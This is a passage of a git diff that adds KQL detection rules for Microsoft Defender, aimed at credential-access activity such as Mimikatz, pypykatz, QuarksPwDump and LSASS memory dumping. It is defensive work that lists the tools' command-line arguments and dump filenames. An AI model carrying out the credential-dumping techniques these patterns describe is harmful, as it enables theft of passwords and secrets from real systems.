browsers " or ProcessCommandLine contains " chats " or ProcessCommandLine contains " databases " or ProcessCommandLine contains " games " or ProcessCommandLine contains " mails " or ProcessCommandLine contains " maven " or ProcessCommandLine contains " memory " or ProcessCommandLine contains " multimedia " or ProcessCommandLine contains " php " or ProcessCommandLine contains " svn " or ProcessCommandLine contains " sysadmin " or ProcessCommandLine contains " unused " or ProcessCommandLine contains " wifi ") and (ProcessCommandLine contains "-1Password" or ProcessCommandLine contains "-apachedirectorystudio" or ProcessCommandLine contains "-autologon" or ProcessCommandLine contains "-ChromiumBased" or ProcessCommandLine contains "-coreftp" or ProcessCommandLine contains "-credfiles" or ProcessCommandLine contains "-credman" or ProcessCommandLine contains "-cyberduck" or ProcessCommandLine contains "-dbvis" or ProcessCommandLine contains "-EyeCon" or ProcessCommandLine contains "-filezilla" or ProcessCommandLine contains "-filezillaserver" or ProcessCommandLine contains "-ftpnavigator" or ProcessCommandLine contains "-galconfusion" or ProcessCommandLine contains "-gitforwindows" or ProcessCommandLine contains "-hashdump" or ProcessCommandLine contains "-iisapppool" or ProcessCommandLine contains "-IISCentralCertP" or ProcessCommandLine contains "-kalypsomedia" or ProcessCommandLine contains "-keepass" or ProcessCommandLine contains "-keepassconfig" or ProcessCommandLine contains "-lsa_secrets" or ProcessCommandLine contains "-mavenrepositories" or ProcessCommandLine contains "-memory_dump" or ProcessCommandLine contains "-Mozilla" or ProcessCommandLine contains "-mRemoteNG" or ProcessCommandLine contains "-mscache" or ProcessCommandLine contains "-opensshforwindows" or ProcessCommandLine contains "-openvpn" or ProcessCommandLine contains "-outlook" or ProcessCommandLine contains "-pidgin" or ProcessCommandLine contains "-postgresql" or ProcessCommandLine contains "-psi-im" or ProcessCommandLine contains "-puttycm" or ProcessCommandLine contains "-pypykatz" or ProcessCommandLine contains "-Rclone" or ProcessCommandLine contains "-rdpmanager" or ProcessCommandLine contains "-robomongo" or ProcessCommandLine contains "-roguestale" or ProcessCommandLine contains "-skype" or ProcessCommandLine contains "-SQLDeveloper" or ProcessCommandLine contains "-squirrel" or ProcessCommandLine contains "-tortoise" or ProcessCommandLine contains "-turba" or ProcessCommandLine contains "-UCBrowser" or ProcessCommandLine contains "-unattended" or ProcessCommandLine contains "-vault" or ProcessCommandLine contains "-vaultfiles" or ProcessCommandLine contains "-vnc" or ProcessCommandLine contains "-winscp")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql new file mode 100644 index 00000000..176f3c7c --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Mimikatz Execution +// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton +// Date: 2019-10-22 +// Level: high +// Description: Detection well-known mimikatz command line arguments +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql new file mode 100644 index 00000000..61235ab3 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Mimikatz Kirbi File Creation +// Author: Florian Roth (Nextron Systems), David ANDRE +// Date: 2021-11-08 +// Level: critical +// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql new file mode 100644 index 00000000..2496574f --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql @@ -0,0 +1,10 @@ +// Title: HackTool - NPPSpy Hacktool Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-29 +// Level: high +// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file +// MITRE Tactic: Credential Access +// Tags: attack.credential-access + +DeviceFileEvents +| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql new file mode 100644 index 00000000..b60b4fe2 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump +// Author: SecurityAura +// Date: 2022-11-16 +// Level: high +// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql new file mode 100644 index 00000000..87a112ad --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Pypykatz Credentials Dumping Activity +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql new file mode 100644 index 00000000..a002049e --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Quarks PwDump Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: high +// Description: Detects usage of the Quarks PwDump tool via commandline arguments +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql new file mode 100644 index 00000000..fd78877b --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql @@ -0,0 +1,10 @@ +// Title: HackTool - QuarksPwDump Dump File +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-10 +// Level: critical +// Description: Detects a dump file written by QuarksPwDump password dumper +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql new file mode 100644 index 00000000..f71507b9 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql @@ -0,0 +1,13 @@ +// Title: HackTool - RemoteKrbRelay Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-27 +// Level: high +// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\RemoteKrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "RemoteKrbRelay.exe") or (ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -target " and ProcessCommandLine contains " -victim ") or (ProcessCommandLine contains "-rbcd " and (ProcessCommandLine contains "-cn " or ProcessCommandLine contains "--computername ")) or (ProcessCommandLine contains "-chp " and (ProcessCommandLine contains "-chpPass " and ProcessCommandLine contains "-chpUser ")) or (ProcessCommandLine contains "-addgroupmember " and ProcessCommandLine contains "-group " and ProcessCommandLine contains "-groupuser ") or ((ProcessCommandLine contains "interactive" or ProcessCommandLine contains "secrets" or ProcessCommandLine contains "service-add") and (ProcessCommandLine contains "-smb " and ProcessCommandLine contains "--smbkeyword ")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql new file mode 100644 index 00000000..642a7667 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SafetyKatz Dump Indicator +// Author: Markus Neis +// Date: 2018-07-24 +// Level: high +// Description: Detects default lsass dump filename generated by SafetyKatz. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Rare legitimate files with similar filename structure + +DeviceFileEvents +| where FolderPath endswith "\\Temp\\debug.bin" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql new file mode 100644 index 00000000..da8d62a6 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SafetyKatz Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-20 +// Level: critical +// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql new file mode 100644 index 00000000..84427743 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SecurityXploded Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2018-12-19 +// Level: critical +// Description: Detects the execution of SecurityXploded Tools +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql new file mode 100644 index 00000000..a3e59eb1 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Typical HiveNightmare SAM File Export +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-23 +// Level: high +// Description: Detects files written by the different tools that exploit HiveNightmare +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934 +// False Positives: +// - Files that accidentally contain these strings + +DeviceFileEvents +| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql new file mode 100644 index 00000000..44f3e002 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql @@ -0,0 +1,11 @@ +// Title: HackTool - WinPwn Execution +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-12-04 +// Level: high +// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 + +DeviceProcessEvents +| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql new file mode 100644 index 00000000..f65cbe0d --- /dev/null +++ b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql @@ -0,0 +1,12 @@ +// Title: Interesting Service Enumeration Via Sc.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-02-12 +// Level: low +// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". +Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. + +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access + +DeviceProcessEvents +| where ProcessCommandLine contains "query" and ProcessCommandLine contains "termservice" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql new file mode 100644 index 00000000..5581b8b5 --- /dev/null +++ b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql @@ -0,0 +1,12 @@ +// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) +// Author: Thomas Patzke +// Date: 2019-01-16 +// Level: medium +// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - NTDS maintenance + +DeviceProcessEvents +| where FolderPath endswith "\\ntdsutil.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql new file mode 100644 index 00000000..a84d7439 --- /dev/null +++ b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql @@ -0,0 +1,13 @@ +// Title: Loaded Module Enumeration Via Tasklist.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-02-12 +// Level: medium +// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". +This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. +In order to dump the process memory or perform other nefarious actions. + +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access + +DeviceProcessEvents +| where (ProcessCommandLine contains "-m" or ProcessCommandLine contains "/m" or ProcessCommandLine contains "–m" or ProcessCommandLine contains "—m" or ProcessCommandLine contains "―m") and (FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe") and ProcessCommandLine contains "rdpcorets.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql new file mode 100644 index 00000000..32fc34d6 --- /dev/null +++ b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql @@ -0,0 +1,13 @@ +// Title: LSASS Dump Keyword In CommandLine +// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-24 +// Level: high +// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql new file mode 100644 index 00000000..784863db --- /dev/null +++ b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql @@ -0,0 +1,12 @@ +// Title: Lsass Full Dump Request Via DumpType Registry Settings +// Author: @pbssubhash +// Date: 2022-12-08 +// Level: high +// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate application that needs to do a full dump of their process + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql new file mode 100644 index 00000000..3caa51d8 --- /dev/null +++ b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql @@ -0,0 +1,12 @@ +// Title: LSASS Process Dump Artefact In CrashDumps Folder +// Author: @pbssubhash +// Date: 2022-12-08 +// Level: high +// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Rare legitimate dump of the process by the operating system due to a crash of lsass + +DeviceFileEvents +| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\" \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql new file mode 100644 index 00000000..d75b0ba2 --- /dev/null +++ b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql @@ -0,0 +1,12 @@ +// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-10-19 +// Level: high +// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql new file mode 100644 index 00000000..51bdd5d6 --- /dev/null +++ b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql @@ -0,0 +1,10 @@ +// Title: LSASS Process Memory Dump Files +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-15 +// Level: high +// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents +| where (FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp" or FolderPath endswith "\\rustive.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdmp" or FolderPath contains "\\lsassdump") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or ((FolderPath contains "\\nanodump" or FolderPath contains "\\proc_") and FolderPath endswith ".dmp") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql new file mode 100644 index 00000000..c7374d0b --- /dev/null +++ b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql @@ -0,0 +1,10 @@ +// Title: LSASS Process Reconnaissance Via Findstr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceProcessEvents +| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " -i \"lsass" or ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " –i \"lsass" or ProcessCommandLine contains " —i \"lsass" or ProcessCommandLine contains " ―i \"lsass" or ProcessCommandLine contains " -i lsass.exe" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains " –i lsass.exe" or ProcessCommandLine contains " —i lsass.exe" or ProcessCommandLine contains " ―i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass") \ No newline at end of file diff --git a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql new file mode 100644 index 00000000..49aed8f5 --- /dev/null +++ b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql @@ -0,0 +1,10 @@ +// Title: Microsoft IIS Connection Strings Decryption +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-28 +// Level: high +// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql new file mode 100644 index 00000000..36361a87 --- /dev/null +++ b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql @@ -0,0 +1,10 @@ +// Title: Microsoft IIS Service Account Password Dumped +// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea) +// Date: 2022-11-08 +// Level: high +// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql new file mode 100644 index 00000000..298e6b33 --- /dev/null +++ b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql @@ -0,0 +1,11 @@ +// Title: Microsoft Teams Sensitive File Access By Uncommon Applications +// Author: @SerkinValery +// Date: 2024-07-22 +// Level: medium +// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528 + +DeviceFileEvents +| where (FileName contains "\\Microsoft\\Teams\\Cookies" or FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql new file mode 100644 index 00000000..985f4f6f --- /dev/null +++ b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql @@ -0,0 +1,10 @@ +// Title: Mount Execution With Hidepid Parameter +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-12 +// Level: medium +// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.t1564 + +DeviceProcessEvents +| where (ProcessCommandLine contains "hidepid=2" and ProcessCommandLine contains " -o ") and FolderPath endswith "/mount" \ No newline at end of file diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql new file mode 100644 index 00000000..285f26e8 --- /dev/null +++ b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql @@ -0,0 +1,14 @@ +// Title: New Generic Credentials Added Via Cmdkey.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-03 +// Level: medium +// Description: Detects usage of "cmdkey.exe" to add generic credentials. +As an example, this can be used before connecting to an RDP session via command line interface. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.005 +// False Positives: +// - Legitimate usage for administration purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p" or ProcessCommandLine contains " –p" or ProcessCommandLine contains " —p" or ProcessCommandLine contains " ―p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u" or ProcessCommandLine contains " –u" or ProcessCommandLine contains " —u" or ProcessCommandLine contains " ―u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_dit_created.kql b/KQL/rules/Credential Access/ntds_dit_created.kql new file mode 100644 index 00000000..e2defb35 